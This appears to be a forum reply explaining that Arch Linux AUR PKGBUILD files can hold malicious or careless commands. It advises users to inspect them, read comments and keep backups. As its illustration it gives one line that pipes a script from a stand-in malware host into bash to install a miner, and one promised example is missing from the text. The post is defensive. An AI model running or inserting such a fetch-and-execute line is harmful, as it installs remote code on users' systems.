Yes, a PKGBUILD could easily contain a line like:
/bin/bash <(curl -s http://www.malware.com/install_bitcoin_miner.sh)
It can also contain stupid mistakes by people writing the code, which are not intentionally malicious, but can nevertheless destroy your system and cause you to lose data. For example:
That’s why you should check it whenever you’re building a package from the AUR. Also, read the comments on the AUR webpage, stick to more popular packages and report anything malevolent or suspicious. Also, you should have all important data backed up, that should go without saying.
However, the PKGBUILD used to build packages in the repos could also contain something like above (well, it probably wouldn’t install malware on the packager’s local computer, that would be stupid 
). The difference is that you cannot check for that, since the package is already built when you get it, hence you are blindly trusting the packager.